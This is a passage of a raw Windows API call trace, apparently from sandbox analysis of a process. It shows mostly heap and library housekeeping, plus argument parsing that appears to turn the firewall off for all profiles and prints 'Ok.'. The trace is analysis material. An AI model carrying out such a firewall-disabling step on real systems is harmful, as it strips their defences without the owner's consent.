[0226.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34ab00 [0226.006] GetProcessHeap () returned 0x2c0000 [0226.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3073f0 [0226.006] wcscpy_s (in: _Destination=0x3073f0, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0226.006] GetProcessHeap () returned 0x2c0000 [0226.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ea80 | out: hHeap=0x2c0000) returned 1 [0226.006] GetProcessHeap () returned 0x2c0000 [0226.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a9a0 | out: hHeap=0x2c0000) returned 1 [0226.006] GetProcessHeap () returned 0x2c0000 [0226.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34aa40 | out: hHeap=0x2c0000) returned 1 [0226.006] GetProcessHeap () returned 0x2c0000 [0226.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34aa40 [0226.006] _wcsnicmp (_String1="set", _String2="dum", _MaxCount=0x3) returned 15 [0226.006] _wcsnicmp (_String1="set", _String2="hel", _MaxCount=0x3) returned 11 [0226.006] _wcsnicmp (_String1="set", _String2="?", _MaxCount=0x3) returned 52 [0226.007] _wcsnicmp (_String1="set", _String2="res", _MaxCount=0x3) returned 1 [0226.007] _wcsnicmp (_String1="set", _String2="imp", _MaxCount=0x3) returned 10 [0226.007] _wcsnicmp (_String1="set", _String2="exp", _MaxCount=0x3) returned 14 [0226.007] _wcsnicmp (_String1="set", _String2="con", _MaxCount=0x3) returned 16 [0226.007] _wcsnicmp (_String1="set", _String2="fir", _MaxCount=0x3) returned 13 [0226.007] _wcsnicmp (_String1="set", _String2="mai", _MaxCount=0x3) returned 6 [0226.007] _wcsnicmp (_String1="set", _String2="mon", _MaxCount=0x3) returned 6 [0226.007] _wcsnicmp (_String1="set", _String2="set", _MaxCount=0x3) returned 0 [0226.007] _wcsnicmp (_String1="allprofiles", _String2="help", _MaxCount=0xb) returned -7 [0226.007] _wcsnicmp (_String1="allprofiles", _String2="?", _MaxCount=0xb) returned 34 [0226.007] wcstok (in: _String="domainprofile", _Delimiter=" ", _Context=0x1b69c0 | out: _String="domainprofile", _Context=0x1b69c0) returned="domainprofile" [0226.008] _wcsnicmp (_String1="allprofiles", _String2="domainprofi", _MaxCount=0xb) returned -3 [0226.008] wcstok (in: _String="privateprofile", _Delimiter=" ", _Context=0x1b69f0 | out: _String="privateprofile", _Context=0x1b69f0) returned="privateprofile" [0226.008] _wcsnicmp (_String1="allprofiles", _String2="privateprof", _MaxCount=0xb) returned -15 [0226.008] wcstok (in: _String="publicprofile", _Delimiter=" ", _Context=0x1b6a20 | out: _String="publicprofile", _Context=0x1b6a20) returned="publicprofile" [0226.008] _wcsnicmp (_String1="allprofiles", _String2="publicprofi", _MaxCount=0xb) returned -15 [0226.008] wcstok (in: _String="currentprofile", _Delimiter=" ", _Context=0x1b6a50 | out: _String="currentprofile", _Context=0x1b6a50) returned="currentprofile" [0226.008] _wcsnicmp (_String1="allprofiles", _String2="currentprof", _MaxCount=0xb) returned -2 [0226.008] wcstok (in: _String="allprofiles", _Delimiter=" ", _Context=0x1ac720 | out: _String="allprofiles", _Context=0x1ac720) returned="allprofiles" [0226.008] _wcsnicmp (_String1="allprofiles", _String2="allprofiles", _MaxCount=0xb) returned 0 [0226.009] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned 0x0 [0229.530] LoadStringW (in: hInstance=0x0, uID=0x2, lpBuffer=0x1431d0, cchBufferMax=8192 | out: lpBuffer="Ok.\n") returned 0x4 [0229.636] FormatMessageW (in: dwFlags=0x500, lpSource=0x1431d0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x1431b0, nSize=0x0, Arguments=0x1431c0 | out: lpBuffer="癐4") returned 0x5 [0229.636] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.636] GetConsoleOutputCP () returned 0x1b5 [0229.637] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0229.637] GetProcessHeap () returned 0x2c0000 [0229.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x6) returned 0x307400 [0229.637] GetConsoleOutputCP () returned 0x1b5 [0229.637] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x307400, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ok.\r\n", lpUsedDefaultChar=0x0) returned 6 [0229.637] WriteFile (in: hFile=0x7, lpBuffer=0x307400*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x143160, lpOverlapped=0x0 | out: lpBuffer=0x307400*, lpNumberOfBytesWritten=0x143160*=0x5, lpOverlapped=0x0) returned 1 [0229.638] GetProcessHeap () returned 0x2c0000 [0229.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x307400 | out: hHeap=0x2c0000) returned 1 [0229.639] LocalFree (hMem=0x347650) returned 0x0 [0229.639] FormatMessageW (in: dwFlags=0x500, lpSource=0xc91504, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x1471e0, nSize=0x0, Arguments=0x1471f0 | out: lpBuffer="ꦠ4") returned 0x2 [0229.639] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.639] GetConsoleOutputCP () returned 0x1b5 [0229.639] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0229.639] GetProcessHeap () returned 0x2c0000 [0229.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3) returned 0x307400 [0229.639] GetConsoleOutputCP () returned 0x1b5 [0229.639] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x307400, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0229.639] WriteFile (in: hFile=0x7, lpBuffer=0x307400*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x147190, lpOverlapped=0x0 | out: lpBuffer=0x307400*, lpNumberOfBytesWritten=0x147190*=0x2, lpOverlapped=0x0) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x307400 | out: hHeap=0x2c0000) returned 1 [0229.640] LocalFree (hMem=0x34a9a0) returned 0x0 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a920 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a900 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3073b0 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a960 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a980 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3073d0 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34b7f0 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33aa50 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33aa30 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3073c0 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a9d0 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a940 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a880 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a8c0 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a8a0 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x307390 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a8e0 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a9b0 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33aa10 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a9f0 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a990 | out: hHeap=0x2c0000) returned 1 [0230.018] GetProcessHeap () returned 0x2c0000 [0230.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31ec30 | out: hHeap=0x2c0000) returned 1 [0230.018] FreeLibrary (hLibModule=0xc90000) returned 1 [0230.018] FreeLibrary (hLibModule=0x7fefbc80000) returned 1 [0230.020] free (_Block=0x277e90) [0230.022] LocalFree (hMem=0x2e4580) returned 0x0 [0230.022] LocalFree (hMem=0x2e48d0) returned 0x0 [0230.022] LocalFree (hMem=0x2e49e0) returned 0x0 [0230.022] LocalFree (hMem=0x2e3080) returned 0x0 [0230.022] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x339190 [0230.022] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x2e3080 [0230.022] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x345eb0 [0230.023] free (_Block=0x275a70) [0230.023] free (_Block=0x0) [0230.023] free (_Block=0x275a50) [0230.023] free (_Block=0x275a90) [0230.023] free (_Block=0x275ae0) [0230.023] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x347530 [0230.030] LocalFree (hMem=0x347530) returned 0x0 [0230.030] LocalFree (hMem=0x2e4a00) returned 0x0 [0230.030] LocalFree (hMem=0x339190) returned 0x0 [0230.030] free (_Block=0x277c80) [0230.030] GetModuleHandleA (lpModuleName="MSVCRT.DLL") returned 0x7fefdee0000 [0230.031] FreeLibrary (hLibModule=0x7fefdee0000) returned 1 [0230.031] LocalFree (hMem=0x345eb0) returned 0x0 [0230.031] LocalFree (hMem=0x2e3080) returned 0x0 [0230.031] GlobalHandle (pMem=0x2e4360) returned 0xb80008 [0230.031] GlobalUnlock (hMem=0xb80008) returned 0 [0230.098] FreeLibrary (hLibModule=0x7fef3720000) returned 1 [0230.100] FreeLibrary (hLibModule=0x7fef4d70000) returned 1 [0230.125] FreeLibrary (hLibModule=0x7fef4370000) returned 1 [0230.128] FreeLibrary (hLibModule=0x7fefb970000) returned 1 [0230.129] FreeLibrary (hLibModule=0x7fef4350000) returned 1 [0230.135] FreeLibrary (hLibModule=0x7fef36a0000) returned 1 [0230.138] FreeLibrary (hLibModule=0x7fef92c0000) returned 1 [0230.140] FreeLibrary (hLibModule=0x7fef3660000) returned 1 [0230.145] FreeLibrary (hLibModule=0x7fef4c20000) returned 1 [0230.150] FreeLibrary (hLibModule=0x7fef4c10000) returned 1 [0230.203] FreeLibrary (hLibModule=0x7fef4c00000) returned 1 [0230.206] FreeLibrary (hLibModule=0x7fef4be0000) returned 1 [0230.209] FreeLibrary (hLibModule=0x7fef3450000) returned 1 [0230.242] FreeLibrary (hLibModule=0x7fef4cf0000) returned 1 [0230.293] FreeLibrary (hLibModule=0x7fef3250000) returned 1 [0230.311] FreeLibrary (hLibModule=0x7fef4c50000) returned 1 [0230.312] FreeLibrary (hLibModule=0x7fef4b20000) returned 1 [0231.565] FreeLibrary (hLibModule=0x7fef4c40000) returned 1 [0231.568] FreeLibrary (hLibModule=0x7fef4a00000) returned 1 [0231.586] FreeLibrary (hLibModule=0x7fef3070000) returned 1 [0231.591] GetProcessHeap () returned 0x2c0000 [0231.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31e8b0 | out: hHeap=0x2c0000) returned 1 [0231.643] GetProcessHeap () returned 0x2c0000 [0231.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07d0 | out: hHeap=0x2c0000) returned 1 [0231.643] GetProcessHeap () returned 0x2c0000 [0231.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07f0 | out: hHeap=0x2c0000) returned 1 [0231.643] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0810 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0830 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0850 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0870 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08c0 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08e0 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0900 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0920 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0940 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0960 | out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0980 | out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e09a0 | out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e09c0 | out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e09e0 | out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0a00 | out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0a20 | out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0a40 | out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0a60 | out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0a80 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0aa0 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0ac0 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0ae0 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0b00 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0b20 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0b40 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0b60 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0b80 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0ba0 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0bc0 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0be0 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0c00 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0c20 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0c40 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0c60 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0c80 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0ca0 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0cc0 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0ce0 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0d00 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0d20 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0d40 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0d60 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0d80 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0da0 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0dc0 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0de0 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0e00 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0e20 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0e40 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0e60 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0e80 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0ea0 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0ec0 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0ee0 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0f00 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0f20 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0f40 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0f60 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0f80 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0fa0 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0fc0 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0fe0 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1000 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1020 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1040 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1060 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e10c0 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e10e0 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1100 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1120 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1140 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1160 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1180 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e11a0 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 [0231.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e11c0 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 [0231.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e11e0 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 [0231.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1200 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 [0231.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1220 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 [0231.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1240 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 [0231.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1260 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 [0231.651] HeapFree (in: hHeap=0x2c0000, 